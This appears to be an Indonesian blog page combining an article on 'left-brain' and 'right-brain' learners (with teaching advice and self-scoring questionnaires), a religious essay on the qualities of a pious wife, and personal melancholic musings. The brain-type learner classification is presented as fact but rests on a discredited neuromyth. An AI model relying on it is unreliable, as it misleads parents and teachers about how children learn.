Biasanya sangat reliable, prestasi disekolah baik.
Menyukai sesuatu yang dikenalnya dan yang dapat diperkirakannya. Tidak menyenangi tantangan, ide baru dan perubahan pada rutinitas. Mempunyai kecenderungan untuk menerima dan menghargai apa yang didengar dan dibaca daripada bertanya dan berpikir secara mandiri.
Mengerjakan sesuatu lebih memilih dalam kelompok dibanding bekerja sendiri.
Akan berhasil dalam pekerjaan rutinitas, tapi tidak berhasil bila memerlukan kreatifitas untuk penyelesaian masalah.
B. INDIVIDU DENGAN OTAK KANAN
Tipe pembelajaran visual (melalui rangsang mata). Dia akan belajar dengan gambar lalu membuat dengan caranya sendiri
Intuitif dan prosesnya acak (tidak berurutan) Informasi terutama disimpan dalam bentuk gambar.
Ingatan visualnya kuat, ingatan dengarnya lemah. Ingatan dalam imajinasi dapat bertahan dalam waktu yang lama
Terdapat keterlambatan dalam memproses sesuatu yang didengar, karena kata yang didengar harus diubah menjadi gambar mental (mental
picture).
Bila mengingat seseorang atau kejadian, akan ingat imajinasi orang tersebut dan dapat mengingat detail kejadian
Kurang mampu untuk menampilkan sesuatu secara logis, atau pekerjaan
yang berhubungan dengan bahasa.Lebih memilih menggambar dan berkreasi dibanding menulis dan bicara. Senang mengerjakan beberapa pekerjaan
pada saat yang bersamaan.
Menyukai pekerjaan dimana mereka dapat bergerak bebas dan tidak perlu duduk diam.
Tidak menyukai aturan, impulsif dan sering bertanya. Menyenangi tantangan baru, penuh ide, sangat kompetitif dan perfeksionis.
Seorang genius yang kreatif, menyenangi seni dan musik
Cara berpikirnya menyeluruh (holistik), proses belajar secara menyeluruh untuk mengetahui bagian bagian kecil (whole to part learners)
Berpikirnya spasial (ruang) dan 3 dimensi
Keterampilan didapat dari demonstrasi, tidak dari penjelasan tahapan tahapan yang harus dilalui
C. INDIVIDU DENGAN OTAK KIRI-KANAN
Mempunyai kemampuan untuk memindahkan pekerjaan sesuai dengan otak yang dibutuhkan.
Bila melibatkan proses membaca dan melakukan pekerjaan yang logis, dapat berlaku secara efisien dan secara berurutan.
Mempunyai kemampuan kreatif misalnya menggambar, memainkan musik Mempunyai kemampuan (menyeluruh) holistic untuk menyelesaikan masalah yang besar dan perhatian detail.
Mempunyai kemampuan untuk mengorganisir dari otak kiri dan kemampuan kreatif dan brilliant dari otak kanan.
III. PROSES BELAJAR PADA OTAK KIRI DAN OTAK KANAN
1. BACA-TULIS- EJA
PADA OTAK KIRI . OTAK KIRI-KANAN: (Njiokiktjien 1997, NJiokiktjien
2003)
a. Pemahaman dan pengenalan apa yang dilihat.
Mula mula anak belajar membaca melalui proses penglihatan, dimana bentuk huruf dan kata harus dicamkan dan diingat; kemudian bentuk tersebut diidentifikasi, diingat dan dihubungkan dengan bunyi huruf/kata.
b. Hubungan antara deret huruf dan deret bunyi
Setelah ada proses pemahaman tentang apa yang dilihat, didalam otak deretan huruf akan dirubah menjadi deretan bunyi, sehingga terjadi perekaman kata. Deretan huruf ini akan masuk dalam proses didaerah pendengaran sehingga terjadi pemanggilan bunyi.
c. Menganalisa apa yang didengar.
Perbendaharaan kata pada permulaan bahasa bicara diwujudkan sebagai kesatuan bunyi,kemudian anak tahu bahwa satu kata terdiri
dari beberapa bunyi tersendiri. Anak harus belajar untuk menganalisa apa yang didengar.
d. Pemahaman apa yang dibaca.
Bila sudah terdapat kemajuan dalam proses membaca, bacaan
tersebut harus dapat dimengerti sehingga dapat membuat ringkasan atau jalan pikiran dari apa yang telah dilihat. Untuk tahapan ini anak
tidak boleh ada kesulitan dalam menemukan kata, dapat bicara dengan lancar, mempunyai tata bahasa yang digunakan.
PADA OTAK KANAN (Freed, 1997)
a. Mengeja (Visual Spelling)
Proses berpikir pada individu dengan otak kanan adalah secara visual
dan spasial(penglihatan dalam ruang). Anak dapat membedakan konsonan tapi sulit untuk membedakan vocal tertentu. Karena proses berpikirnya dalam ruang, mudah terjadi inverse huruf, dan terlihat seperti
cermin. Karena penglihatannya 3 dimensi, maka kata yang dilihat dapat terimajinasi berotasi (dari arah atas, bawah, seperti cermin).
Bentuk kata yang dilihat , diimajinasikan, lalu diingat. Setelah itu baru dapat dieja kedepan atau dieja mundur. Agar lebih mudah
terperhatikan kata tersebut harus ditulis berwarna dengan masing suku kata diberi warna yang berbeda. Perlihatkan keanak selama 20 detik
agar dapat terekam dipikirannya.
Anak akan sulit untuk menuliskan apa yang dilihat karena harus melihat kebawah, yang mempengaruhi proses pemanggilan kembali imajinasi visualnya.
Setelah menguasai dengan satu kata, ditingkatkan dengan gabungan
beberapa kata atau satu kalimat.
b. Membaca
Proses membaca dimulai dengan melihat kata, diubah menjadi gambar didalam pikirannya, lalu diucapkan dengan kata.
Hal ini akan sulit dikerjakan karena konsentrasi anak lebih mudah
beralih, informasi diproses dengan acak dan pandangan dapat melompat atau mundur dari kata yang harus dibaca. Jadi proses membaca menjadi tidak lancar; akan ada kata yang terlewati dan baris yang terlompati.
Bila anak ini mengerti konsep untuk mengubah kata menjadi gambar didalam pikirannya (mental picture), anak akan dapat membaca dalam hati.
Pola belajar yang whole to part, mengakibatkan ketidak mampuan dalam belajar huruf bunyi (fonem). Anak biasanya baru dapat membaca dikelas
3, setelah perbendaharaan kata yang dilihatnya banyak.
Metode phonic yang memecah kata menjadi huruf bunyi seperti yang diajarkan secara konfensional dan memerlukan proses pendengaran dan berurutan, hanya dapat dipakai untuk pola belajar otak kiri atau ke 2
otak (part to whole).
Pada otak kanan dipakai metode bahasa yang menyeluruh (whole
language), dimana ini akan merangsang anak untuk senang membaca dan mengerti (komprehensif), baru kemudian memperbaiki detail (ejaan dan
tata bahasa).
Anak diperlihatkan kata utuh dan dibacakan utuh untuk kemudian direkam dalam pikirannya (jangan dibiarkan anak untuk menebak).
c. Membaca dalam hati
Individu dengan pola belajar dengan otak kanan adalah seorang pembaca dalam hati yang ulung, dan dapat membaca dengan cepat, karena membaca adalah komprehensif (pemahaman) dan komprehensif adalah visual
(sesuatu yang dapat dilihat).
Pada individu dengan pola belajar memakai otak kiri walau dapat
membaca cepat, belum tentu pemahamannya baik. Untuk memahami apa yang dibaca , harus dengan membaca perlahan (silent) dan pelan pelan
(slowly), sehingga kata kata tersebut akan masuk kedalam pikirannya. Biasanya menggunakan catatan , sehingga penyimpanan informasinya sistimatik.
Individu dengan otak kanan akan membaca dengan cepat, melakukan scanning terhadap kata kata yang ada, sehingga mendapatkan gambaran detailnya.
Mula mula dibacakan, lalu disuruh untuk merubah kata kata tersebut menjadi gambar mental.
d. Menulis.
Merupakan hal yang paling sulit untuk dikerjakan karena koordinasi motorikhalus umumnya juga terganggu.
Orientasi visualnya yang multidimensi membuat kecenderungan untuk melakukan kesalahan dalam menyalin huruf dan angka.
Terdapat kesulitan dalam mengalihkan dari gambar yang ada dipikirannya kedalam kertas dalam bentuk kata, membentuk huruf, ejaan, pemisahan kata, karena terjadi distorsi dari mental picturenya. Pada otak kiri, berpikirnya secara symbol dan dalam bentuk kata,, sehingga mudah untuk menerjemahkan pikirannya ke kertas.
Pada otak kanan, sejak awal anak cenderung perfeksionis. Jadi bila
terdapat kesalahan menulis yang harus diperbaiki membuatnya tidak mau menulis. Anak disuruh berbicara lambat, lalu kita menuliskan kata
tersebut, beri tanda baca dan pemisahan kata; dengan demikian dia mengerti bagaimana cara menulis. Kemudian kita berbicara dengan lambat, anak disuruh menuliskan. Bila terdapat kesalahan perbaikilah kata tersebut secara kata yang utuh.
2. BERHITUNG
PADA OTAK KIRI (Njiokiktjien 1997, Njiokiktjien 2003).
a. Dapat menghitung dan mempunyai pengertian bilangan.
Sebelum anak mampu berhitung, harus ada pengertian tentang jumlah dan pengertian tentang perbedaan diantara jumlah tersebut.
Saat balita anak belajar berhitung dalam situasi fisik dan konkrit, menghubungkan jumlah tersebut dengan bahasa yang diucapkan yaitu bilangan2 kemudian disusul dengan angka angka.
Pengertian bilangan ( pengertian jumlah tanpa ada benda
fisik /konkrit yang dapat dihitung) harus sudah dimiliki pada usia 5
tahun.
b. Bahasa pada proses berhitung
Membagi atau merubah suatu jumlah, pengertian ditambah dan dikurangi, lebih besar dan lebih kecil perlu diajarkan selama perkembangan
bicara dalam bentuk gerakan dan penglihatan. Salah satu syarat untuk dapat berhitung adalah tidak mengalami gangguan perkembangan berbahasa.
c. Mengerjakan simbol simbol hitungan.
Syarat lain untuk berhitung adalah mengenal bentuk lambang hitungan, sehingga proses berhitung dapat berlangsung.
d. Proses berhitung sentral
Operasi matematika (tambah, kurang, kali dan bagi) akan dipelajari
pada ahir periode manipulasi secara konkrit. Operasi matematika tidak tergantung dari simbul tertulis.
e. Faktor lain pada berhitung.
Perhatian, pencaman dan daya ingat jangka pendek yang baik perlu untuk mencongak. Juga perlu daya ingat yang baik tentang apa yang
didengar verbal. Pada mencongak juga diperlukan imajinasi penglihatan (visual) selama hitungan hitungan belum mampu dilakukan secara otomatis. Pada operasi yang lebih besar diperlukan keberuntunan, yang
satu dulu, baru yang lain dan diperlukan urutan yang tepat serta perencanaan.
PADA OTAK KANAN (Freed, 1997)
Proses pembelajaran secara berlatih (drill), pengulangan dan ujian dengan waktu yang terbatas, hanya sesuai untuk individu dengan otak kiri.
Karena pola belajar pada otak kanan adalah visual, maka ilustrasikan
konsep matematika secara visual misalmya menghitung uang, menggunakan sempoa.
Kekuatan individu ini terdapat pada intuisi matematika, sedangkan perhitungan arithmatika yang sederhana merupakan sisi kelemahannya. Proses pembelajaran dengan menarik minat mereka dengan memperkenalkannya pada konsep matematika yang kompleks misalnya bilangan negatif, kuadrat, akar, tenaga (power), sebelum ahirnya diperkenalkan pada konsep dasar yaitu penjumlahan, pembagian sederhana, perkalian.
Kegiatan tersebut dapat berupa menghitung volume air yang ada di
botol, mengetahui berapa lama kereta api dapat menempuh jarak bandung- jakarta bila kecepatannya tertentu, kegiatan memasak dengan cara
menakar menggunakan cangkir dan sendok akan mengajarkankonsep volume, pecahan, perkalian.
Setelah dapat memahami proses perhitungan sederhana dan persamaan, dengan mudah akan dapat memahami sesuatu yang lebih abstrak dan konsep yang sulit ( misalnya geometri, kalkulus)
Proses berpikirnya visual; hindari anak disuruh menulis, tidak perlu menghitung dengan jari, dalam suasana relax, tidak ada tekanan karena pembatasan waktu, lakukan latihan mental matematika yang melibatkan keberuntunan secara auditori dan konsep matematika.
Dengan cara ini akan memotong daerah kelemahan anak (proses dengar) dan merubahnya menjadi kekuatan menggunakan kemampuan visualnya. Latihan mental matematika ini juga memanfaatkan kemampuan visual
tanpa gangguan untuk menuliskan atau menunjukan cara (langkah)
penyelesaian.
Jangan memberi soal yang berlebihan ; cukup 5-10 soal dengan masalah yang berbeda.
KESIMPULAN
Terdapat 3 tipe proses belajar pada individu yaitu otak kiri, otak kanan dan kedua otak.
Harus dikenali pola belajar pada anak didik agar metode pembelajaran sesuai dengan yang dibutuhkan, sehingga hasil yang diperoleh optimal.
DAFTAR KEPUSTAKAAN
Freed J . The Left-Right Brain Continum. In: Right Brained Children
in a Left Brained World. Simon & Schuster. Avenue.1997.
Freed J . Spelling. In: Right Brained Children in a Left Brained
World. Simon & Schuster. Avenue.1997:96-103
Freed J . Reading. In: Right Brained Children in a Left Brained
World. Simon & Schuster. Avenue.1997:104-122
Freed J . Math. In: Right Brained Children in a Left Brained World. Simon & Schuster. Avenue.1997:123-136
Freed J . Writing. In: Right Brained Children in a Left Brained
World. Simon & Schuster. Avenue.1997:137-145
Njiokiktjien .Attention and Memory Development. In Pediatric
Behavioural Neurology. Suyi Publicaties Amsterdam. 1988: 224-245
Njiokiktjien. Dysleksia and Dyscalculia. In Pediatric Behavioural
Neurology. Suyi Publicaties Amsterdam. 1988: 311-327.
Njiokiktjien. Kesulitan Belajar pada Membaca, Menulis, dan Berhitung. Dalam Masalah dalam Perkembangan Psikomotor. Suyi Publ. Indonesia, Semarang. 2003:
PERTANYAAN UNTUK MENGINVENTARISIR POLA BELAJAR ANAK USIA 5-
13 TAHUN
1. Apakah anak anda sangat banyak bergerak ?
2. Apakah anak anda mengalami kesulitan dalam mewarna dan menulis ?
3. Apakah anak anda mengalami keterlambatan dalam berjalan ?
4. Apakah anak anda sangat sensitif terhadap kritikan ?
5. Aapakah anak anda menderita alergi atau asma ?
6. Apakah anak anda terampil dalam membangun mainan (building toys), misalnya Lincoln logs Legos dan Tinker toys?
7. Apakah anak anda terampil dalam permainan teka teki
(puzzles) dan yang tercerai berai (mazes)?
8. Bila anda membacakan sebuah buku kepada anak anda dua atau 3
kali, dapatkah dia mengisi kata yang hilang dengan ingatan yang sangat baik ?
9. Apakah sangat penting bahwa anak menyukai guru disekolah agar dapat mengerjakan pekerjaan dengan baik didalam kelas ?
10. Apakah anak anda mudah beralih perhatiannya, atau sering melamun ?
11. Apakah anak anda tidak dapat menyelesaikan tugas secara konsisten ?
12. Apakah anak anda cenderung berbuat duli baru berpikir ?
13. Apakah anda harus memotong label baju anak anda?
Apakah anak anda hanya mau memakai baju yang lembut dan well worn ?
14. Apakah anak anda overwhelmed pada saat berolah raga, pesta yang ramai, amusement park?
15. Apakah anak nada cenderung malu dan menghindari pelukan?
16. Apakah anak anda harus selalu diingatkan untuk mengerjakan sesuatu pekerjaan ?
17. Apakah anak anda sangat kompetitif (bersaing) dan tidak mau kalah ?
18. Apakah anak anda memiliki rasa humor yang baik ?
Apakah dia mempunyai kemampuan diatas rata rata untuk mengerti dan menciptakan permainan kata ?
19. Apakah anak anda sempurna dalam mencoba cara dalam melakukan sesuatu yang baru
20. Mampukah anak anda mengingat kembali saat liburan atau kejadian pada 1 atau 2 tahun yang lalu secara gamblang detailnya ?
Hasil : makin banyak jawaban "ya" makin kearah kanan
"ya" 0 -4 = sangat otak kiri
5 -8 = lebih otak kiri
9 -12 = otak kiri-kanan
13-16 = lebih otak kanan
17-20 = sangat otak kanan
PERTANYAAN UNTUK MENENTUKAN OTAK KIRI ATAU OTAK KANAN PADA ANAK USIA
BELASAN DAN DEWASA
1. Apakah anda lebih baik mengingat wajah dibanding nama seseorang ?
2. Bila anda dihadapkan pada mainan atau harus memasangkan
perabotan, apakah anda akan membuang petunjuk tertulisnya dan mencoba coba sendiri bagaimana cara memasangnya ?
3. Apakah anda lebih baik memikirkan ide bila anda ditinggal sendirian, konsentrasi, dibandingkan bekerja berkelompok ?
4. Apakah anda lebih mengandalkan pada gambar untuk mengingat sesuatu dibanding nama dan kata kata?
5. Apakah anda mengalami terutama kehilangan pendengaran akut ?
6. Apakah anda memotong label baju?
Apakah anda menukai bahan pakaian yang lembut dan well worn, dibanding bahan yang kasar ?
7. Apakah anda cenderung untuk sering put yourself down ?
8. Bila anda diminta untuk mengeja kata, apakah anda melihat diingatan atau menyebutkannya secara apa yang didengar (phonetic) ?
9. Bila anda mempelajari sesuatu, apakah anda lebih memilih mempelajari secara menyeluruh dulu, dibandingkan mempelajari banyak fakta ?
10. Apakah anda terampil dalam membuat teka teki (puzzle) dan kesimpang siuran (mazes) ?
11. Apakah anda mudah membayangkan dalam 3 dimensi dengan baik ? Dengan kata lain dapatkah anda memvisualisasikan kubus dibenak anda,
memutarnya, dan melihatnya dari berbagai sudut tanpa kesulitan ?
12. Apakah anda tergolong telat berkembang (late bloomer)?
13. Apakah anda harus menyukai guru anda agar dapat berprestasi baik dikelas ?
14. Apakah perhatian anda cepat beralih dan sering melamun ?
15. Apakah anda seorang yang perfeksionis dalam mencoba menyelesaikan masalah yang baru ?
16. Apakah anda seorang yang yang sangat kompetitif , pantang menyerah dibanding orang lain ?
17. Apakah anda seorang yang dapat menjelaskan seseorang dengan baik ?
Apakah orang lain menganggap anda adalah seorang yang dapat membaca seseorang dengan baik ?
18. Apakah tulisan tangan anda dibawah rata rata atau termasuk buruk ?
19. Apakah saat kanak kanak anda mengalami keterlambatan dalam berjalan atau keterlambatan motorik lainnya ?
20. Bila anda berada dalam ruangan yang baru, apakah anda cenderung mudah untuk mencari jalan disekeliling ?
Hasil : makin banyak jawaban "ya" makin kearah kanan
"ya" 0 -4 = sangat otak kiri 13-16 = lebih otak kanan
5 -8 = lebih otak kiri 17-20 = sangat otak kanan
9 -12 = otak kiri-kanan
http://ykai.net/index.php?
option=com_content&task=view&id=195&Itemid=68
ISTRI YANG SHOLEH A ITU???
. Istri Shalihah, Keutamaan dan Sifat-Sifatnya Penulis: Al-Ustadzah Ummu Ishaq Zulfa Husein Al-Atsariyyah Sakinah, Mengayuh Biduk, 04 - Februari - 2005, 18:43:08
Apa yang sering diangankan oleh kebanyakan laki-laki tentang wanita yang bakal menjadi pendamping hidupnya? Cantik, kaya, punya kedudukan, karir bagus, dan baik pada suami. Inilah keinginan yang banyak muncul. Sebuah keinginan yang lebih tepat disebut anganangan, karena jarang ada wanita yang memiliki sifat demikian. Kebanyakan laki-laki lebih memperhatikan penampilan dzahir, sementara unsur akhlak dari wanita tersebut kurang diperhatikan. Padahal akhlak dari pasangan hidupnya itulah yang akan banyak berpengaruh terhadap kebahagiaan rumah tangganya Seorang muslim yang shalih, ketika membangun mahligai rumah tangga maka yang menjadi dambaan dan cita-citanya adalah agar kehidupan rumah tangganya kelak berjalan dengan baik, dipenuhi mawaddah wa rahmah, sarat dengan kebahagiaan, adanya saling ta‘awun (tolong menolong), saling memahami dan saling mengerti. Dia juga mendamba memiliki istri yang pandai memposisikan diri untuk menjadi naungan ketenangan bagi suami dan tempat beristirahat dari ruwetnya kehidupan di luar. Ia berharap dari rumah tangga itu kelak akan lahir anak turunannya yang shalih yang menjadi qurratu a‘yun (penyejuk mata) baginya.
Demikian harapan demi harapan dirajutnya sambil meminta kepada Ar-Rabbul A‘la (Allah Yang Maha Tinggi) agar dimudahkan segala urusannya. Namun tentunya apa yang menjadi dambaan seorang muslim ini tidak akan terwujud dengan baik terkecuali bila wanita yang dipilihnya untuk menemani hidupnya adalah wanita shalihah. Karena hanya wanita shalihah yang dapat menjadi teman hidup yang sebenarnya dalam suka maupun lara, yang akan membantu dan mendorong suaminya untuk taat kepada Allah Subhanahu wa Ta'ala. Hanya dalam diri wanita shalihah tertanam aqidah tauhid, akhlak yang mulia dan budi pekerti yang luhur. Dia akan berupaya ta‘awun dengan suaminya untuk menjadikan rumah tangganya bangunan yang kuat lagi kokoh guna menyiapkan generasi Islam yang diridhai Ar-Rahman.Sebaliknya, bila yang dipilih sebagai pendamping hidup adalah wanita yang tidak terdidik dalam agama1 dan tidak berpegang dengan agama, maka dia akan menjadi duri dalam daging dan musuh dalam selimut bagi sang suami. Akibatnya rumah tangga selalu sarat dengan keruwetan, keributan, dan perselisihan. Istri seperti inilah yang sering dikeluhkan oleh para suami, sampai-sampai ada di antara mereka yang berkata: “Aku telah berbuat baik kepadanya dan memenuhi semua haknya namun ia selalu menyakitiku.” Duhai kiranya wanita itu tahu betapa besar hak suaminya, duhai kiranya dia tahu akibat yang akan diperoleh dengan menyakiti dan melukai hati suaminya….! Namun dari mana pengetahuan dan kesadaran itu akan didapatkan bila dia jauh dari pengajaran dan bimbingan agamanya yang haq?
Wallahu Al-Musta‘an.
iseng2


disiini akau menyadari betapa sepihnya hari ini tanpa seorang kekasih,
sampai kapan aku harus mencari sebuah akhir penantianku ini.
tlah sampailah titik dimana aku bosan dengan mereka semua yang akau ahrapa dapat
memberiku sebuah artin namun mereka sama saja tak pernah mengerti. walaupun mereka
menyadari betapa terpuruknya aku disni tapi tak sedikitpun mereka mau peduli.
lebih baik aku akhiri memuja mereka aku sudahi mencintai mereka.
cukup sama disini aku berikan semua yang aku punya(CINTA).
aku

Aku
Bila seumpama kalian adalah sebuah perhiasan yang harganya tak terhingga dan anda tak dapat digapai oleh orang-orang yang mengginginkan. Sebagian yang tak mampu menggapai kalian adalah aku, dan sebagian lagi adalah mereka yang sanggup menggapai kalian, dan sebagian lagi adalah orang yang mudah menggapai kalian. Semuanya sama satu tujuan berharap memilki kalian dan kalian tak sedikitpun niat-niat diantara orang-orang yang menginginkan kalian, begitu juga aku yang tak pernah sedikitpun kalian tau sebenarnya mengapa aku menginginkan kalian. Dan kalian juga tak pernah tau mengapa harus kalian yang mendapatkan sebuah pertanyaan??
Aku sedikit demi sedikit memahami situasi kalian yang memperhitungkan keadaan kalian yang sebenarnya tak menentu pola pkir kalian terhadapa apa yang kalian putuskan. Sudahkah benar apa yang kalian lakukan sebelum kalian membenarkan apa yang anda lakukan??...
Mungkin sebuah takdir yang menentukan apa yang telah ditentukan. Ada sebuah pernyataan yang sebenarnya mungkin kalian tak pernah mendengar sebelumnya??...
“Mengapa sebuah perhitungan dilakukan saat semua terbiasa tak bernilai???...”
Pernyataan tersebut dapat kalian simpulkan menurut apa yang anda pikirkan. Dan dari jawaban kalian dapat dimengerti apakah kalian telah melakukan hal yang benar atau tidak.
Kebanyakan yang pernah aku alami adalah sebuah pengakuan bahwa aku adalah bukan orang terbaik diantara mereka dihadapan kalian. Dan aku hanyalah sebuah kiasan tak bermakna untuk kalian. Seperti tanda kutip(” ”)yang jarang anda gunakan untuk makna yang positif. Dan tanda tersebut memakna maksud pola piker kalian terhadap apa yang telah kalian dapatkan.
Selebihnya adalah klesalahan aku dalam menyikapi apa yang aku harapkan dari kalian. keinginan yang berlebihan membuat aku terlarut dalam ketergantungan kalian yang sehingga membuat kalian menentukan sebuah aturan. Semakin kalian tersohor semakin meluap nilai kalian tanpa anda perhitungan.
Tahukah kalian???
Diantara mereka teleh memahami betul siapa kalian…
Begitu juga aku yang telah mengamati cara kalian…
Apakah kalian tidak mersa dirugikan dengan kondisi yang kalian dapat sekarang??
Ketergantungan posisi kalian kalian adalah pada sohoran aku dan mereka yang meluapkan nilai kalian…
Pernahkah kalian berpikir saat aku dan mereka berpindah haluan???
Apakah anda tau dimana saat itu posisi kalian…
Dan mengapa bias aku dan mereka melawan takdir yang telah ditentukan??
Mengapa bisa keinginan aku dan mereka akan memiliki sosok kalian dapat hilang??
Apakah sebab itu dari kalian???
Atau sudah permainan tuhan membolak-balik posisi kalian???
Ataukah itu dari kesalahan yang telah dilakukan???
Jawabnya da pada hati kecil kalian dan aku hanya sekedar menyimpulkan….
Aku , mereka dan kalian sangatlah sama membagi pola pikir dengan hasrat akan sebuah keinginan yang mungkin telah ditentukan.
Kebanyakan yang telah aku rasakan adalah sebuah kekhilafan yang dikarenakan kurangnya bersyukur dengan apa yang telah dianugerahkan…
Sebagian dari umur yang telah Allah berikan terhadap aku adalah kebanyakan melakukan sebuah pelajaran dari sebuah kesalahan yang mendapatkan satu pengalaman.
Hingga saat ini aku dan mereka masih terus mengamati sikap-sikap diantara orang-orang seperti kalian. begitu inginnya aku dan mereka membuat kalian mengethui sebuah jawaban. Dan itu bukan maksud untuk memojokkan kalian yang begitu beruntung jika kalian dapat ingat tanpa diingatkan.
Satu orang diantara kalian yang ingin sekali menyadari kesalahan yang telah kalian lakukan adalah aku. Aku yang sebenarnya juga bagian dari orang-orang seperti kalian.
Aku sangatlah ingin menemukan jawaban dari apa yang telah dijadikan sebuah pertanyaan???
Ingatkah kalian saat kita melontarkan sebuah jawaban tapa ada sebuah pertanyaan. Dan itu biasa kita semua bilang adalah sebuah PERNYATAAN…
Aku adalah ketiadaan antara hidup dan matiku yang tak pernah dapat aku tentukan, namun begitu pantaskah aku masih terdapat dalam kebahagian kalian. aku hanyalah sisa dari beberapa orang yang tak pernah kalian pahami. Aku meratapi apa yang aku alami dan kalian hanya perlu memperlihatkan bagaimana sikap kalian menipuku dengan sebuah senyuman agar sedikitnya aku dapat ikut merasakan yang sebenarnya tidak pernah aku rasakan dari kalian.
Aku yang mengikuti cara kalian berbagi ketidaktahuan aku tentang kebahagiaan yang kalian selalu rasakan, sebenarnya menyadari semua itu karena rasa kasihan kalian terhadap apa yang aku rasakan. Kalian yang bergitu berharga untuk segala detik yang aku jalankan. Ketidak tahuan yang selalu aku mencoba tanyakan kepada kalian selalu saja kalian jawab dengan cara bagaimana kalian mencoba membuatku tetap sabar merasakan apa yang aku dapatkan. Kalian yang selalu mencoba menuntun aku dengan berbagi canda kalian yang sebenarnya hanya karena kalian tak ingin membuatku semakin terpuruk begitu dalam. Sungguh hanya kalian orang-orang yang selalu membuatku tetap dapat menempuh semua ketidakstabilan kehidupan. Namun tak cukupkah bagiku mendapatkan kepedulian kalaian akan segala kepedihan yang terobati karena adanya kalian. begitu terbelenggunya aku saat kalian lelah menemani kekosongan aku yang terlarut begitu dalam di sebuah keadaaan yang menyakitkan. Adakah ada lagi orang-orang seperti kalian yang begitu rela berbagi waktu untuk orang yang tak berhak mendapatkan waktu bersama kalian. Mudahkah aku untuk membalaz jasa-jasa kalian yang pernah menganggap sebagai seorang teman. Mungkinkah kalian masih menemaniku saat aku begitu lupa akan dimana jalan kalian yang telah memihak pada kelebihan kalian.
Subscribe to:
Posts (Atom)